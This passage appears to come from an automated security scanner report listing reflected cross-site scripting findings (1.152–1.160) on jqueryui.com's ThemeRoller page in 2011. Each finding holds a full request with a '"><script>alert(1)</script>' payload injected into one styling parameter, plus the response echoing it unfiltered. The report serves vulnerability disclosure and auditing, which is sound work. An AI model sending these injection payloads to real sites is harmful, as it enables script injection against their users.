_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222f066a"><script>alert(1)</script>31ec4226d13&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover
...[SNIP]...

1.152. http://jqueryui.com/themeroller/ [fcDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4e5f"><script>alert(1)</script>a1c0288782c was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555b4e5f"><script>alert(1)</script>a1c0288782c&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
pacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555b4e5f"><script>alert(1)</script>a1c0288782c&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.
...[SNIP]...

1.153. http://jqueryui.com/themeroller/ [fcError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d63a"><script>alert(1)</script>02028214c2d was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a6d63a"><script>alert(1)</script>02028214c2d&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a6d63a"><script>alert(1)</script>02028214c2d&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

1.154. http://jqueryui.com/themeroller/ [fcHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3af5a"><script>alert(1)</script>8b223fd84ef was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=2222223af5a"><script>alert(1)</script>8b223fd84ef&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=2222223af5a"><script>alert(1)</script>8b223fd84ef&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefau
...[SNIP]...

1.155. http://jqueryui.com/themeroller/ [fcHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d31ec"><script>alert(1)</script>eba326948fc was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636d31ec"><script>alert(1)</script>eba326948fc&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636d31ec"><script>alert(1)</script>eba326948fc&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_fl
...[SNIP]...

1.156. http://jqueryui.com/themeroller/ [fcHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea519"><script>alert(1)</script>df022702129 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121ea519"><script>alert(1)</script>df022702129&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121ea519"><script>alert(1)</script>df022702129&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight
...[SNIP]...

1.157. http://jqueryui.com/themeroller/ [ffDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c7de"><script>alert(1)</script>abcacab3b7 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif5c7de"><script>alert(1)</script>abcacab3b7&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif5c7de"><script>alert(1)</script>abcacab3b7&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgCol
...[SNIP]...

1.158. http://jqueryui.com/themeroller/ [fsDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2541b"><script>alert(1)</script>dff14ea4a89 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em2541b"><script>alert(1)</script>dff14ea4a89&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em2541b"><script>alert(1)</script>dff14ea4a89&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent
...[SNIP]...

1.159. http://jqueryui.com/themeroller/ [fwDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2996"><script>alert(1)</script>4dcec26e9e5 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normalc2996"><script>alert(1)</script>4dcec26e9e5&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120002

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normalc2996"><script>alert(1)</script>4dcec26e9e5&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&
...[SNIP]...

1.160. http://jqueryui.com/themeroller/ [iconColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5033f"><script>alert(1)</script>6745da73ba4 was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=4545455033f"><script>alert(1)</script>6745da73ba4&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=4545455033f"><script>alert(1)</script>6745da73ba4&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pn
...[SNIP]...

